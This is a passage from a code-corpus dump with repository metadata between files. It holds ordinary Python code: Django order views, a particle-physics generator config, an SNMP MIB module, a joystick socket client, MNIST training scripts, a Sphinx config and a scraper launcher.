'products': products
}
return render(request, 'accounts/products.html', context)
@login_required(login_url = 'login')
@allowed_users(allowed_roles=['admin'])
def createOrder(request, **kwargs):
OrderFormSet = inlineformset_factory(Customer, Order, fields=('product', 'status'), extra=5)
customer = Customer.objects.get(id = kwargs['id'])
formSet = OrderFormSet(queryset=Order.objects.none(), instance=customer)
#form = OrderForm(initial = {'customer':customer})
if request.method == "POST":
formSet = OrderFormSet(request.POST, instance=customer)
#form = OrderForm(request.POST)
if formSet.is_valid():
formSet.save()
return redirect('/')
context = {'formset': formSet}
return render(request, 'accounts/order_form.html', context)
@login_required(login_url = 'login')
@allowed_users(allowed_roles=['admin'])
def updateOrder(request, **kwargs):
order = Order.objects.get(id = kwargs['id'])
form = OrderForm(instance = order)
if request.method == "POST":
form = OrderForm(request.POST, instance=order)
if form.is_valid():
form.save()
return redirect('/')
context = {'form': form}
return render(request, 'accounts/order_form.html', context)
@login_required(login_url = 'login')
@allowed_users(allowed_roles=['admin'])
def deleteOrder(request, **kwargs):
order = Order.objects.get(id = kwargs['id'])
if request.method == "POST":
if request.POST.get('Yes'):
order.delete()
return redirect('/')
context = {'item': order}
return render(request, 'accounts/delete_order.html', context)
@login_required(login_url = 'login')
@allowed_users(allowed_roles=['customer'])
def userPage(request):
orders = request.user.customer.order_set.all()
print('\nORDERS', orders)
total_orders = orders.count()
delivered = orders.filter(status = 'Delivered').count()
pending = orders.filter(status = 'Pending').count()
context = {
'orders': orders,
'total_orders': total_orders,
'delivered': delivered,
'pending': pending}
return render(request, 'accounts/user.html', context)
@login_required(login_url='login')
@allowed_users(allowed_roles=['customer'])
def accountSettings(request):
customer = request.user.customer
form = CustomerForm(instance = customer)
if request.method == 'POST':
form = CustomerForm(request.POST, request.FILES, instance=customer)
if form.is_valid():
form.save()
context = {'form':form}
return render(request, 'accounts/account_settings.html', context)
@unauthenticated_user
def registerPage(request):
form = CreateUserForm()
if request.method == "POST":
form = CreateUserForm(request.POST)
if form.is_valid():
user = form.save()
username = form.cleaned_data.get('username')
messages.success(request, 'User ' + username + ' created!')
return redirect('login')
context = {'form':form}
return render(request, 'accounts/register.html', context)
@unauthenticated_user
def loginPage(request):
if request.method == "POST":
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect('dashboard')
else:
messages.info(request, 'Username or password is incorrect')
context = {}
return render(request, 'accounts/login.html', context)
def logoutPage(request):
logout(request)
return redirect('login') | [
"[email protected]"
] | |
e5d73ed435640a6033f68a23bf2813e2f9c10c29 | 0806383e9809acf99011cca90b1eed7b1a080165 | /2018/B2Phi_fragment_hardQCD.py | d81621ee6f6585a7ba6596a7a53eac86d65ac822 | [] | no_license | mmasciov/B2PhiSignalProduction | dbfeb436b3ec6efa969bc65b7c3401cfa781c710 | 4967569f0dd41878c76f0b54bf261f619823376b | refs/heads/master | 2022-11-13T05:24:38.492389 | 2020-07-07T16:07:25 | 2020-07-07T16:07:25 | 277,762,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,259 | py | import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.MCTunes2017.PythiaCP5Settings_cfi import *
# Production Info
configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$1.0$'),
name = cms.untracked.string('$Generic BBbar with a long-lived scalar resonance$'),
annotation = cms.untracked.string('Generic BBbar with a long-lived scalar resonance')
)
generator = cms.EDFilter("Pythia8GeneratorFilter",
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CP5SettingsBlock,
processParameters = cms.vstring(
'HardQCD:hardbbbar = on',
'PhaseSpace:pTHatMin = 3',
'ParticleDecays:limitTau0 = off',
'6000211:all = GeneralResonance void 0 0 0 2.0 0.001 0.0 0.0 50',
'6000211:oneChannel = 1 1.0 101 13 -13',
'521:addChannel = 1 1 1 6000211 321',
'511:addChannel = 1 1 1 6000211 311',
'531:addChannel = 1 1 1 6000211 333',
'541:addChannel = 1 1 1 6000211 431',
'5122:addChannel = 1 1 1 6000211 3122',
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CP5Settings',
'processParameters'),
),
comEnergy = cms.double(13000),
crossSection = cms.untracked.double(1),
filterEfficiency = cms.untracked.double(-1),
maxEventsToPrint = cms.untracked.int32(0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
pythiaPylistVerbosity = cms.untracked.int32(0)
)
### Filters
llphitomumukingenfilter = cms.EDFilter("PythiaDauVFilter",
verbose = cms.untracked.int32(1),
NumberDaughters = cms.untracked.int32(2),
ParticleID = cms.untracked.int32(6000211),
DaughterIDs = cms.untracked.vint32(13, -13),
MinPt = cms.untracked.vdouble( 3.0, 3.0),
MinEta = cms.untracked.vdouble(-2.4,-2.4),
MaxEta = cms.untracked.vdouble( 2.4, 2.4)
)
llphigenfilter = cms.EDFilter("PythiaDauFilter",
MinPt = cms.untracked.double(3.0),
MinEta = cms.untracked.double(-2.4),
MaxEta = cms.untracked.double( 2.4),
ParticleID = cms.untracked.int32(6000211),
DaughterIDs = cms.untracked.vint32(-13,13),
NumberDaughters = cms.untracked.int32(2)
)
### Production+filter sequence
ProductionFilterSequence = cms.Sequence(generator*llphitomumukingenfilter)
#ProductionFilterSequence = cms.Sequence(generator*llphigenfilter)
#ProductionFilterSequence = cms.Sequence(generator)
| [
"[email protected]"
] | |
3bd68691d412aeb06306ca53f88dfdcbe655bd24 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/NETSCREEN-SET-GEN-MIB.py | 33889b0e14736f295d3c28103487928e28685020 | [
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 5,948 | py | #
# PySNMP MIB module NETSCREEN-SET-GEN-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NETSCREEN-SET-GEN-MIB
# Produced by pysmi-0.3.4 at Wed May 1 14:20:23 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, SingleValueConstraint, ConstraintsUnion, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ConstraintsUnion", "ValueRangeConstraint")
netscreenSetting, netscreenSettingMibModule = mibBuilder.importSymbols("NETSCREEN-SMI", "netscreenSetting", "netscreenSettingMibModule")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibIdentifier, Counter64, Counter32, Unsigned32, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, ObjectIdentity, ModuleIdentity, IpAddress, Bits, iso, Gauge32, NotificationType, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "Counter64", "Counter32", "Unsigned32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "ObjectIdentity", "ModuleIdentity", "IpAddress", "Bits", "iso", "Gauge32", "NotificationType", "Integer32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
netscreenSetGenMibModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 3224, 7, 0, 1))
netscreenSetGenMibModule.setRevisions(('2005-08-12 00:00', '2004-05-03 00:00', '2004-03-03 00:00', '2003-11-10 00:00', '2001-09-28 00:00', '2001-05-27 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: netscreenSetGenMibModule.setRevisionsDescriptions(('This module defines the object that are used to monitor all the configuration info', 'Modified copyright and contact information', 'Converted to SMIv2 by Longview Software', 'Correct spelling mistake', 'No Comment', 'Creation Date',))
if mibBuilder.loadTexts: netscreenSetGenMibModule.setLastUpdated('200405032022Z')
if mibBuilder.loadTexts: netscreenSetGenMibModule.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: netscreenSetGenMibModule.setContactInfo('Customer Support 1194 North Mathilda Avenue Sunnyvale, California 94089-1206 USA Tel: 1-800-638-8296 E-mail: [email protected] HTTP://www.juniper.net')
if mibBuilder.loadTexts: netscreenSetGenMibModule.setDescription('obsolete nsSetGenSysIp')
nsSetGeneral = MibIdentifier((1, 3, 6, 1, 4, 1, 3224, 7, 1))
nsSetGenSysIp = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 1), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenSysIp.setStatus('obsolete')
if mibBuilder.loadTexts: nsSetGenSysIp.setDescription('System Ip address')
nsSetGenHostName = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenHostName.setStatus('current')
if mibBuilder.loadTexts: nsSetGenHostName.setDescription('Host name of NetScreen device.')
nsSetGenDomain = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenDomain.setStatus('current')
if mibBuilder.loadTexts: nsSetGenDomain.setDescription('Domain name of NetScreen device.')
nsSetGenOpMode = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenOpMode.setStatus('current')
if mibBuilder.loadTexts: nsSetGenOpMode.setDescription('NetScreen device can work in one of the tree mode: transparent, NAT and route. This attribute indicates which operation mode it use.')
nsSetGenSwVer = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenSwVer.setStatus('current')
if mibBuilder.loadTexts: nsSetGenSwVer.setDescription('NetSceen OS version.')
nsSetGenLicInfo = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenLicInfo.setStatus('current')
if mibBuilder.loadTexts: nsSetGenLicInfo.setDescription('NetScreen OS license information.')
nsSetGenSCSAdminEnable = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("disable", 0), ("enabled", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenSCSAdminEnable.setStatus('current')
if mibBuilder.loadTexts: nsSetGenSCSAdminEnable.setDescription('enable Command Security Shell')
nsSetGenDropSelfLogPac = MibScalar((1, 3, 6, 1, 4, 1, 3224, 7, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("disable", 0), ("enabled", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsSetGenDropSelfLogPac.setStatus('current')
if mibBuilder.loadTexts: nsSetGenDropSelfLogPac.setDescription('Log Packets to Self that are dropped')
mibBuilder.exportSymbols("NETSCREEN-SET-GEN-MIB", nsSetGenDomain=nsSetGenDomain, nsSetGenOpMode=nsSetGenOpMode, nsSetGenLicInfo=nsSetGenLicInfo, nsSetGenSwVer=nsSetGenSwVer, nsSetGenHostName=nsSetGenHostName, nsSetGenDropSelfLogPac=nsSetGenDropSelfLogPac, netscreenSetGenMibModule=netscreenSetGenMibModule, nsSetGenSysIp=nsSetGenSysIp, nsSetGeneral=nsSetGeneral, nsSetGenSCSAdminEnable=nsSetGenSCSAdminEnable, PYSNMP_MODULE_ID=netscreenSetGenMibModule)
| [
"[email protected]"
] | |
ae92bab68137c027aa8f8979fd89aa003e2c5df6 | 2c81510e6d3a179ef65888791ba164a840614299 | /Network/gamepad/gamepad_client.py | 62f1fd836bcc1e3151ddc66d0b0baa9b5587e040 | [] | no_license | Alisa712/CYTON-VETA-7-DOF-Robot-Sensing-Touch | fe3e08425126a7fb2d88eafd37cad03d48614342 | 5a8e586d253465a235da3af4144ac5c0a4b81a71 | refs/heads/master | 2021-08-30T09:13:20.411681 | 2017-12-17T06:14:25 | 2017-12-17T06:14:25 | 114,512,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | import socket
import time
import pygame
pygame.init()
joy = pygame.joystick.Joystick(0)
joy.init()
host = 'localhost'
port = 5000
mySocket = socket.socket()
mySocket.connect((host,port))
def joystick():
global out
out = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
it = 0 #iterator
pygame.event.pump()
#Read input from the two joysticks
for i in range(0, joy.get_numaxes()):
out[it] = joy.get_axis(i)
it+=1
#Read input from buttons
for i in range(0, joy.get_numbuttons()):
out[it] = joy.get_button(i)
it+=1
return out
while True:
message = joystick()
mySocket.send(str(message))
print message
time.sleep(0.5)
mySocket.close()
| [
"[email protected]"
] | |
6692fcd716647755e1aea133c8bd8b46dc51ecc7 | b8c2885a4d8daf34c2049ee727655d6de07857fe | /app/api/response/users.py | aefebe7b93d374cb709c22937cfe6c69ff0454e0 | [] | no_license | Ravillatypov/asterisk-integration-api | 870b9804b51dcc640b9b9a571d406f26804a6d30 | d4abeb5b87ab00c4b371d501f3d117feb5e4d72c | refs/heads/master | 2023-06-23T10:55:22.851334 | 2021-07-22T07:55:52 | 2021-07-22T08:24:31 | 264,633,533 | 2 | 1 | null | 2021-01-16T07:54:57 | 2020-05-17T10:04:40 | Python | UTF-8 | Python | false | false | 720 | py | from typing import List
from pydantic import BaseModel
class ResponseUser(BaseModel):
id: int
first_name: str
last_name: str
permissions: List[int]
username: str
is_active: bool
company_id: int = None
class Config:
orm_mode = True
class ResponseUsers(BaseModel):
result: List[ResponseUser]
def __init__(self, result, *args, **kwargs):
super(ResponseUsers, self).__init__(*args, result=[ResponseUser.from_orm(i) for i in result], **kwargs)
class ResponseRefreshAccessToken(BaseModel):
refresh_token: str
access_token: str
class Config:
orm_mode = True
class ResponseUserWithTokens(ResponseUser, ResponseRefreshAccessToken):
pass
| [
"[email protected]"
] | |
2e1b48cbfff274207746ac41229144bc61864cf9 | 0d87d81067a2d028b4d2c1a105df0518ac156b87 | /lab7/task7.py | 798a38e1537d8a63d25ff0dc28fbffb7e341806a | [] | no_license | sterliakov/IT-2022-labs-1-sem | 3c1c9c6250caef2258f443700a361c19cc3a082c | ee256f03198e39b22e385d8d5377bc3de772cdc9 | refs/heads/main | 2023-08-20T09:31:18.190399 | 2021-09-16T08:21:56 | 2021-09-16T08:21:56 | 405,976,481 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | STEPS = 2
def walk(x, y, x0, y0, remaining=STEPS):
if x == x0 and y == y0:
return remaining
remaining -= 1
if remaining == -1 or x <= 0 or y <= 0 or x > 8 or y > 8:
return -1
return max(
walk(x-2, y-1, x0, y0, remaining),
walk(x-2, y+1, x0, y0, remaining),
walk(x+2, y-1, x0, y0, remaining),
walk(x+2, y+1, x0, y0, remaining),
walk(x-1, y+2, x0, y0, remaining),
walk(x-1, y-2, x0, y0, remaining),
walk(x+1, y+2, x0, y0, remaining),
walk(x+1, y-2, x0, y0, remaining),
)
ret = walk(int(input()), int(input()), int(input()), int(input()), 2)
print(-1 if ret == -1 else STEPS - ret)
| [
"[email protected]"
] | |
640e4256d48a98d957149e6ac184e44bf66b3a1c | 31e8765993b0df9988fab3615b346065c43d77db | /MyMainPackage/SubPackage/mysubscript.py | 11a90d17e55bf92b412da5b98055f2a42e305239 | [] | no_license | bopopescu/courses-projects-exercises | a4f37f9b96cb3e564c59fce957fa972db1013415 | d06e9684a79bd97e43c0f007968e55e4fcf11ce8 | refs/heads/master | 2022-11-23T14:26:50.059341 | 2020-04-15T09:56:29 | 2020-04-15T09:56:29 | 281,485,877 | 0 | 0 | null | 2020-07-21T19:27:34 | 2020-07-21T19:27:33 | null | UTF-8 | Python | false | false | 64 | py | def sub_report():
print("Hey I am function inside mysubscript") | [
"[email protected]"
] | |
430e4c22ffcc6af466cbe65051d710988206a800 | 0a7730b3595d16725366d1492e7526e58f65d859 | /docs/conf.py | a492105cb126c004f0e80c07a4c38fb16d531f53 | [] | permissive | telebotter/django-telegrambot | f22127e251cac4700eb79e934f0886bf7beb69bd | 70e6016b09d1fb91dd45e3cf2dc8fd8e82dbc824 | refs/heads/master | 2021-12-25T16:39:09.832480 | 2021-08-02T09:54:16 | 2021-08-02T09:54:16 | 212,980,072 | 15 | 11 | BSD-3-Clause | 2021-08-02T09:54:16 | 2019-10-05T10:17:32 | Python | UTF-8 | Python | false | false | 8,244 | py | # -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
cwd = os.getcwd()
parent = os.path.dirname(cwd)
sys.path.append(parent)
import django_telegrambot
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-telegrambot'
copyright = u'2016, django-telegrambot'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = django_telegrambot.__version__
# The full version, including alpha/beta/rc tags.
release = django_telegrambot.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-telegrambotdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-telegrambot.tex', u'django-telegrambot Documentation',
u'django-telegrambot', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-telegrambot', u'django-telegrambot Documentation',
[u'django-telegrambot'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-telegrambot', u'django-telegrambot Documentation',
u'django-telegrambot', 'django-telegrambot', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"[email protected]"
] | |
c7885620d3be0baf6a989da71453344360e7faaa | 0e6d9b3a64bad502821e267465472dd156007e5f | /mnist.py | f0f0768ea0b63647b2dfc8d564a6cb6d508eb51b | [] | no_license | DuaneNielsen/efficientNet | 990894725fcbf80235574fbe87ca3d47a82cfcbc | 4b8b387890e470e07e66fb425b1450c011d506ef | refs/heads/master | 2023-04-15T02:28:03.716575 | 2021-05-07T22:43:00 | 2021-05-07T22:43:00 | 365,349,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,123 | py | import torch
import torch.nn as nn
from torch.utils.data import DataLoader, Subset
from torchvision.datasets import MNIST
from torch.optim import Adam
from torchvision import transforms
from torch.nn.functional import cross_entropy
from rich.progress import Progress
from collections import deque
from statistics import mean
from torchlars import LARS
from argparse import ArgumentParser
import wandb
import efficient_net
import os
if __name__ == '__main__':
args = ArgumentParser()
args.add_argument('--batch_size', type=int, default=8)
args.add_argument('--lars', action='store_true', default=False)
args.add_argument('--device', type=str)
args.add_argument('--seed', type=int)
args.add_argument('--lr', type=float, default=1e-4)
config = args.parse_args()
if 'DEVICE' in os.environ:
config.device = os.environ['DEVICE']
wandb.init(project='EfficientNet_MNIST', config=config)
if config.seed is not None:
torch.manual_seed(config.seed)
eff_net = efficient_net.EfficientNet(version="b0", num_classes=10).to(config.device)
if config.lars:
optim = LARS(Adam(eff_net.parameters(), lr=config.lr))
else:
optim = Adam(eff_net.parameters(), lr=config.lr)
ds = MNIST('~/.mnist', train=True, download=True, transform=transforms.ToTensor())
dl = DataLoader(ds, batch_size=config.batch_size)
test_s = MNIST('~/.mnist', train=False, download=True, transform=transforms.ToTensor())
test = DataLoader(test_s, batch_size=config.batch_size)
# reached 9762
with Progress() as progress:
t_epoch = progress.add_task('[red] epoch ...', total=100)
t_ds = progress.add_task('[magenta] dataset ...', total=len(ds) / config.batch_size)
t_test = progress.add_task('[blue] dataset ...', total=len(test_s) / config.batch_size)
losses = deque(maxlen=100)
for epoch in range(100):
progress.update(t_epoch, advance=1)
progress.reset(t_ds)
progress.reset(t_test)
for images, labels in dl:
images = images.to(config.device).expand(-1, 3, -1, -1)
labels = labels.to(config.device)
classes = eff_net(images)
loss = cross_entropy(classes, labels)
losses.append(loss.item())
progress.update(t_ds, advance=1, description=f'[magenta] {mean(losses):.5f}')
optim.zero_grad()
loss.backward()
optim.step()
correct = 0
total = 0
for images, labels in test:
images = images.to(config.device).expand(-1, 3, -1, -1)
labels = labels.to(config.device)
classes = eff_net(images)
classes = torch.argmax(classes, dim=1)
for label, cls in zip(classes, labels):
if label == cls:
correct += 1
total += 1
progress.update(t_test, advance=1, description=f'[blue]{correct}/{total}')
wandb.log({'correct': correct})
| [
"[email protected]"
] | |
0ebd026476efa34ac486487b217d08e9853ac2aa | df08b73174ff86bacf305a066eab3a33bf833df1 | /Python_1/HW4/Les_4_Task_5.py | d59c4873ed426a55040434a2dc757a82df902620 | [] | no_license | DanySat/Python | 2eb2aa900040fa0c7cd033d45842451061a38027 | 874e0126ba9eb7d69d906ab0a2895617a5c3477d | refs/heads/master | 2020-12-15T02:53:29.739692 | 2020-03-17T19:01:00 | 2020-03-17T19:01:00 | 234,971,390 | 0 | 0 | null | 2020-03-17T19:01:08 | 2020-01-19T21:33:55 | Python | UTF-8 | Python | false | false | 282 | py | while True:
number = int(input("Введи целое число от 3 до 20: "))
if 2 < number < 21:
print('Пятикратное число равно: ' + str(number * 5))
break
else:
print('Неверное число.')
continue
| [
"[email protected]"
] | |
a979d9410eea53ce04553cf6f644548604644c62 | c4ae5fb88fe588912a1e6cb78ce2744c5457b7e8 | /scrape.py | b0b5858470927615bd4c12143ed17ef3cb5737a7 | [] | no_license | ashingtondc/UrbanDictionaryScraper | bec9ab44d693b6f9c23623ec4f42de7be8d51354 | 0de4b2e1dd4fa88c4806642533e9d3be7e7ed733 | refs/heads/main | 2023-02-25T17:22:15.055818 | 2021-01-29T06:13:22 | 2021-01-29T06:13:22 | 334,049,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | from scrape_utils import scrape_letter
import logging
import multiprocessing as mp
logging.basicConfig(
filename='scrape.log',
filemode='a',
level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p')
pool = mp.Pool(processes=4)
results = [pool.apply_async(scrape_letter, args=[i]) for i in range(65, 91)]
output = [p.get() for p in results]
pool.close()
# for i in range(65, 91):
# scrape_letter(i)
| [
"[email protected]"
] | |
f10f370d928a81de9544c76c61015dd5327ca8f7 | 4eddf6a34715752dc652571b1ab274f51ceb5da0 | /.history/yjs/test_20210606185816.py | 1f68cb0473491ea4a626df30ac2c94945d345bd0 | [] | no_license | Suelt/Hust-SE-introduction-to-ML | 649aba0e5b41363ceac03330ef02982982a0615d | a66785c3085da573f5748d13608eabf02e616321 | refs/heads/master | 2023-05-27T13:13:41.058545 | 2021-06-10T05:44:02 | 2021-06-10T05:44:02 | 375,582,438 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 991 | py | import numpy as np
from tensorflow.keras.datasets import mnist
def convert_to_one_hot(y, C):
return np.eye(C)[y.reshape(-1)].T
def sigmoid(inX):
from numpy import exp
return 1.0 / (1 + exp(-inX))
size=[784,30,10]
num=2
weight = [np.random.randn(ch2,ch1)
for ch1,ch2 in zip(size[:-1], size[1:])]
# [784,30],[30,10] z=wxx+b [30,1]
bias = [np.random.rand(s, 1) for s in size[1:]]
(train_x, train_y), (test_x, test_y) = mnist.load_data()
train_data = []
train_x = train_x.reshape([60000, 784])
for i in range(train_x.shape[0]):
# print(convert_to_one_hot(train_y[i],10).shape)
train_data.append([train_x[i]/255, convert_to_one_hot(train_y[i], 10)])
test_data = []
test_x = test_x.reshape([10000, 784])
for i in range(10000):
test_data.append([test_x[i]/255, test_y[i]])
x,y=train_data[0]
print(y.size)
print(x.size)
#print(x)
times=0
for b, w in zip(bias, weight):
z = np.dot(w, x) + b
x = sigmoid(z)
print(x.size) | [
"[email protected]"
] | |
c4edc1b7dc0d2e222f4048ccba62a3aa1040b6a0 | 0306e5ea656a976ed3e23f2eb207a2565efa77c5 | /src/moderations/models.py | 7f68208f4f3d40e4829db8759dd412963049413c | [
"MIT"
